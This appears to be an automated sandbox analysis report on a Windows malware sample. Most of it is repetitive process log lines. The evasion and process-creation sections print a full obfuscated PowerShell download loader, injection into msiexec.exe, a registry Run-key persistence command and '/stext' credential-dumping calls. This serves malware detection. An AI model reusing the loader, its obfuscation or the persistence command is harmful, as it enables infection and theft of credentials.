                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,18_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4925Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4982Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6210Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3568Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4600Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6484Thread sleep time: -16971000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 3432 delay: -5Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040AE51 FindFirstFileW,FindNextFileW,18_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00418981 memset,GetSystemInfo,18_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: bhv2369.tmp.18.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                Source: powershell.exe, 00000002.00000002.2297010038.0000014FF9523000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3018%SystemRoot%\system32\mswsock.dll0
                Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_19-34025
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04B3D8A4 LdrInitializeThunk,LdrInitializeThunk,5_2_04B3D8A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,18_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,18_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Source: Yara matchFile source: amsi64_2448.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2448, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 40F0000Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (DaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qyucuggstgpeoollwrdamgokovwgtwvpgi"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sahvvz"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"Jump to behavior
